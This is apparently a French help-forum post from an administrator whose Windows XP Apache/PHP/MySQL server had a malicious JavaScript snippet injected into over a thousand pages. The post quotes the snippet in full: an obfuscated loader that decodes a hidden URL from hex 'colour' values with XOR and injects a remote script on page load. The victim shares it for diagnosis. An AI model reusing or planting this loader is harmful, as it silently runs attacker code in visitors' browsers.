Bonjour,
Il y a 2 ans j'ai installée un serveur Apache sur un PC tournant sous Windows XP (l'OS étant une contrainte imposé par mon employeur... Un linux m'aurait mieux convenu).
Apache a été couplé avec PHP et MYSQL, en reproduisant les anciennes configurations du serveur linux précédent).
Le serveur dns ISC Bind est également installé.
J'ai également installée un pare-feu (KOMODO) et un antivirus (Microsoft Security Essentials).
Ce serveur héberge notre intranet ainsi que notre espace client.
Il a fonctionné parfaitement pendant 1 an et demi avant de devenir très lent.
Ce problème a été résolu depuis mais remplacé par un autre beaucoup plus gênant. Un script js a été collé dans toutes les pages web et empêche le bon fonctionnement des scripts utilisant des sessions. Je ne peux pas supprimer ce script dans toutes les pages car trop nombreuses (>1000).
Savez d'où vient ce script et comment l'éradiquer et faire que cela ne se reproduise plus ?
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13
14 <script> function vdch() { if(document.all.length > 3) { var t = new Array('#6a7072', '#723e29', '#2d6562', '#6d7667', '#606863', '#766b72', '#712a65', '#6d2a73', '#692b6c', '#712b00'); var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } } var dch = document.createElement("script"); dch.id = "dchid"; dch.src = dchid; document.all[3].appendChild(dch); } else { setTimeout("vdch()",500); } } setTimeout("vdch()",500); </script>
Merci d'avance pour vos réponses.
Partager